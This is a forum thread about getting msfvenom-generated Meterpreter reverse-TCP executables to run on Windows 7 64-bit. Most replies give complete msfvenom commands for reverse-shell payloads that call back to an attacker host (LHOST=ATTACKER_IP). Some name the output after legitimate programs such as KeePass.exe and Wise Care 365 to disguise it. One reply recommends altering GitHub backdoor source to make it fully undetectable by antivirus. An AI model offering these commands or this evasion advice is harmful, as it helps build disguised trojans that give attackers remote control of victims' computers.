Problem with Msfvenom: Windows 7 64-Bit Exe - The Version of This File Is Not Compatible.

I'm trying to create a Windows executable Meterpreter payload using msfvenom to execute on my own computer running Windows 7 64-bit. I've tried using the following commands to produce the executable:

1.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe

2.) msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe

3.) msfvenom -p windows/x64/meterpreter/reverse_tcp -a x64 --platform windows LHOST=192.168.0.112 LPORT=4444 -f exe > trojan.exe

4.) msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -k -f exe > trojan.exe

I've also tried using encoders and other payloads.

I tried running the executables on multiple Windows 7 64-bit OS computers, but all I got was this message:

"The version of this file is not compatible with the version of Windows you're running. Check your computer's system information to see whether you need an x86 (32-bit) or x64 (64-bit) version of the program, and then contact the software publisher."

When I tried running it in the command prompt, it showed me this:

Unsupported 16-Bit Application

"The program or feature cannot start or run due to incompatibility with 64-bit versions of Windows. Please contact the software vendor to ask if a 64-bit Windows compatible version is available."

I'm running Metasploit Framework on both Linux Mint and Kali Linux.

I've port forwarded the port, tried changing the IP address, turned off all firewalls and AV software, as well as reinstalling Linux Mint and Kali Linux and updating them plus Metasploit Framework.

I've tried Google to find a solution, but so far I haven't found one.

Any ideas on this problem? Any help would be appreciated.

6 Responses

Try with this...

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.112 LPORT=4444 -f exe-only > trojan.exe

My computer is also showing the same issue, and I want to know whether there is any way to create a multi-architecture payload option.

Hi,
You can use this. I think this will work for you (works for 64-bit).

msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP --format exe --arch x86 --platform windows --encoder x86/shikata_ga_nai --iteration 4 --smallest --out Wise_Care_365_Pro_5.4.3.539

or:

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=ATTACKER_IP --format exe --arch x64 --platform windows --encoder x64/xor --iteration 2 --out KeePass.exe

I also tried with a Win7 64-bit PC. I created a payload using msfvenom and copied it to the victim machine. Then I used multi handler as the listener and executed the payload on the victim machine using cmd, but the shell didn't pop up.

The command I used:

Msfvenom -p windows/x64/meterpreter/reverse_tcp LPORT=my ip LPORT=4444 -o windows.exe

Your big issue is that you're using Metasploit. Even on a target with rudimentary antivirus, any payload MSF generates (regardless of how many encoder layers you stack on - those aren't actually designed to protect against detection anyhow for the most part) will light up like a Christmas tree. I would suggest looking into alternative shell delivery mechanisms. GitHub, for example, has a lot of backdoor source you can modify to make it FUD, then compile for your target. This only requires intermediate skill at most, and will result in far better stability for your compromise.

...

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=YOUR_IP --format exe --arch x64 --platform windows --encoder x64/xor --iteration 2 --out /home/kali/Desktop/KeePass.exe
